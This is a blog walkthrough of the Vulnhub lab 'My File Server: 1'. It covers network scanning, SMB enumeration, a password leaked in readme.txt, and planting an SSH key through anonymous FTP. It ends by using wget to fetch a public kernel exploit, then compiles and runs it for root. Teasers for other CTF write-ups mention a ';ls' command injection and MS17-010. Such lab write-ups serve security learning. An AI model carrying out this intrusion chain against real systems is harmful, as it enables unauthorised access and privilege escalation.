My File Server: 1 Vulnhub Walkthrough


Lab Environment

Attacker's Machine: Linux kali 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-3kali1 (2019-11-20) x86_64 GNU/Linux

 Victim's Machine: My File Server: 1
Mapping the local network to determine the IP of vulnerable machine.
Command Used: arp-scan --local

Nmap Scan
Command Used: nmap -A Victim's IP
Results: samba service on port 445

After knowing the samba service is active I fired up smbmap to enumerate it further.
Command Used: smbmap -H Victim's IP
Result: username - smbuser

I decided for further enumeration and used Nikto to scan the target.
Command Used: nikto -h Victim's IP
Results: /readme.txt

Visited the url to view if something useful can be found in readme.txt
Results: my password is rootroot1

Now I am having username "smbuser" and password "rootroot1" to connect to victim's machine via ssh and when tried to connect it timed out my connection.
So, I thought of generating ssh public keys without password with ssh-keygen and then transfer it to 
victim's machine using ftp as ftp anonymous login is allowed.


Now, it's time to connect again to the victim's machine using Username as "smbuser".
Command Used: ssh smbuser@victim's ip 
Results: Connected to the machine without a password and got a shell.

Enumerated kernel version of the machine to gain the root privileges.
Command Used: uname -a 
Results: we got the kernel version and got the exploit on exploit-db 
Exploit: https://www.exploit-db.com/exploits/40616


Now, Downloaded the exploit on victim's machine using wget 
Command Used: wget url of exploit

Exploit page on exploit-db shows the information on how to compile and execute the exploit.

The file I downloaded was not having .c extension so I renamed it 
Command Used: mv 40616 40616.c and compiled the exploit by using gcc 40616.c -o paras -pthread
and ran the exploit by using ./paras 
Results: Gained the root access 



Finally, Read the flag 
Command Used: cat proof.txt



Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows
Read more

CTF - Dina : 1.0.1 walkthrough

Image
     Lab Environment  : Attacker’s Machine :  Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2(2017-11-08) x86_64 GNU/Linux Vulnerable Machine : Dina: 1.0.1 Scanning phase route -n (To know the gateway) i.e 172.16.60.2 arp-scan --local (to know the devices connected to the local network)   Vulnerable machine IP : 172.16.60.154           Using nmap for scanning the IP : nmap -sS -sC -sV  172.16.60.154 We got one open port i.e 80 and http service is active Since the port 80 is open and http service is active then we can open the IP in browser.   Another nmap syntax to know vulnerability if any : nmap --script vuln 172.16.60.154 Now further using dirb for scanning the directories : dirb http://172.16.60.154 Some results are obtained after using dirb .  Opened the http://172.16.60.154/robots.txt and found something interesti
Read more